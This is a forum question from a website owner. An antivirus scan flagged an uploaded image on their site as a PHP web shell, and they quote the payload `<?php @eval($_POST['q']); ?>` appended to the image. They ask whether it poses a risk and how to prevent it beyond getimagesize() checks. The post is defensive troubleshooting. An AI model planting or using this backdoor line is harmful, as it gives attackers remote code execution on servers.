Backdoor:PHP/Webshell.O virus detected in an uploaded image file. Should I be worried? How can I prevent it?
I have a site which allows users to upload images. One uploaded file was recently detected by antivirus software (uploads aren't scanned, this was a system wide scan after)
Upon upload, I check the file extension, the MIME type and also use getimagesize() which returns false if it's not a valid image.
However, it does appear to be a valid image. It loads on the website and on Windows. However, at the end of the file it contains the following
<?php @eval($_POST['q']); ?>
Uploaded images are moved to a publicly accessible folder (with directory indexing disabled) and linked from there (the image is displayed on the page using the HTML <img /> element with a direct link to the image file.
Should I be worried about this? My thinking is that it doesn't matter because I'm not including the file within PHP code, and I'm just serving it directly through nginx, but it does make me feel a bit uneasy. Can I even do anything to prevent this, other than configuring ClamAV or similar to scan uploads? I thought utilising getimagesize() was an accepted solution for verifying a file is an image as I've seen it referenced a few times on here, but in this scenario it didn't detect PHP within the file.
